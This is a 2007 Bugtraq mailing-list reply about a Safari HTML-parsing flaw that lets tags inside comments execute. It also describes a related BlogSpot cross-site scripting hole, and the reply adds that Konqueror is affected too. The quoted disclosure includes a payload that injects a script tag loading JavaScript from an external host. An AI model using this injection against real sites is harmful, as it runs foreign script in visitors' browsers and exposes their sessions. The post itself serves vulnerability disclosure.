Bugtraq mailing list archives

Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability

From: Robert Tasarz <robert.tasarz () greentech pl>
Date: Wed, 24 Jan 2007 06:06:34 +0100

Jose Avila III wrote:

Overview:

Safari on occasions may improperly parse the source of an HTML document,
which can lead to the execution of html tags within comments. This can
become dangerous when input filters allow html tags within comments, as
they will get parsed and executed under certain circumstances.

Details:

In some cases you can cause Apple’s Safari browser to execute code when
it should not be executed. In the following example everything within
the comment, in theory should never be executed; however, safari decides
to execute the script tag.

<title>myblog<!--</title></head><body><script
src=http://beanfuzz.com/bean.js> --></title>

Blogs hosted on BlogSpot.com have filter mechanisms for their input;
however, they will allow you to inject anything within comments. This
made it possible to cross site script blogspot.com. Note: Only Safari
viewers will be affected.

Proof of concept: http://dirtybean1234.blogspot.com/

Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99

Vendor Response:

I was unable to get a response from the vendor in regards to this issue

Questions / Comments:
Jose (at) onzra (dot) com


As could be expected, the same problem exists in Konqueror (tested
v.3.5.5 on Debian GNU/Linux Sid).

regards,
  Robert Tasarz

Current thread:

Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jose Avila III (Jan 23)
- Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Robert Tasarz (Jan 24)